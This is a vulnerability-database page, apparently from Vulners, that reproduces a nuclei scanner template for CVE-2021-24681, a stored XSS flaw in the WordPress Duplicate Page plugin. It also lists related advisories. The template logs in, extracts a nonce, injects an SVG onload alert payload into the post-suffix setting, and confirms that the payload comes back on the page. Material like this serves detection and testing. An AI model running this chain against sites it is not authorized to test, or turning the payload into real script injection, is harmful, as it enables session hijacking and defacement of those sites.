Lucene search
K

Duplicate Page WordPress - Stored Cross-Site Scripting

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 33 Views

Duplicate Page WordPress plugin has stored cross-site scripting due to unsanitized settings; upgrade.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-24681
11 Oct 202114:24
circl
CNNVD
WordPress 插件 跨站脚本漏洞
11 Oct 202100:00
cnnvd
CNVD
WordPress Duplicate Page plugin cross-site scripting vulnerability
13 Oct 202100:00
cnvd
CVE
CVE-2021-24681
11 Oct 202110:45
cve
Cvelist
CVE-2021-24681 Duplicate Page <= 4.4.2 - Admin+ Stored Cross-Site Scripting
11 Oct 202110:45
cvelist
EUVD
EUVD-2021-11593
7 Oct 202500:30
euvd
NVD
CVE-2021-24681
11 Oct 202111:15
nvd
OpenVAS
WordPress Duplicate Page Plugin < 4.4.3 XSS Vulnerability
29 Oct 202100:00
openvas
OSV
CVE-2021-24681
11 Oct 202111:15
osv
Patchstack
WordPress Duplicate Page plugin <= 4.4.2 - Stored Cross-Site Scripting (XSS) vulnerability
28 Aug 202100:00
patchstack
Rows per page
id: CVE-2021-24681

info:
  name: Duplicate Page WordPress - Stored Cross-Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    Duplicate Page WordPress plugin <= 4.4.2 contains a stored cross-site scripting caused by unsanitized Duplicate Post Suffix settings in output, letting high privilege users execute malicious scripts, exploit requires high privilege user role.
  impact: |
    Attackers can execute malicious scripts in the context of the site, potentially leading to session hijacking or defacement.
  remediation: |
    Update to the latest version of the plugin where the issue is fixed.
  reference:
    - https://wpscan.com/vulnerability/9ebdd1df-1d6f-4399-8b0f-77a79f841464
    - https://wordpress.org/plugins/duplicate-page
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24681
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2021-24681
    cwe-id: CWE-79
    epss-score: 0.0087
    epss-percentile: 0.54418
    cpe: cpe:2.3:a:duplicatepro:duplicate_page:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: duplicatepro
    product: duplicate_page
    framework: wordpress
    publicwww-url: "/wp-content/plugins/duplicate-page"
  tags: wpscan,cve,cve2021,wordpress,wp,wp-plugin,duplicate-page,xss,vuln
flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/options-general.php?page=duplicate_page_settings HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/options-general.php?page=duplicate_page_settings HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        duplicatepage_nonce_field={{wp_nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dduplicate_page_settings&duplicate_post_status=draft&duplicate_post_redirect=to_list&duplicate_post_suffix="><svg/onload=alert(document.domain)>&submit_duplicate_page=Save+Changes

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Saving Please wait...")'
        condition: and
        internal: true

    extractors:
      - type: regex
        group: 1
        name: wp_nonce
        regex:
          - "id=\"duplicatepage_nonce_field\" name=\"duplicatepage_nonce_field\" value=\"(.*?)\""
        internal: true

  - raw:
      - |
        GET /wp-admin/options-general.php?page=duplicate_page_settings&msg=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "duplicate_post_suffix", "\"><svg/onload=alert(document.domain)>")'
        condition: and
# digest: 4a0a00473045022100bb2d818ad249042367646ba0f7a64ca1df0f1cb59d090f9ed64eee86eea96ba5022012cb6fffb54ce0fb1d5dac0f3004cfe57bb75395459eb65075da295400fb5476:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 23.5
CVSS 3.14.8
EPSS0.0087
33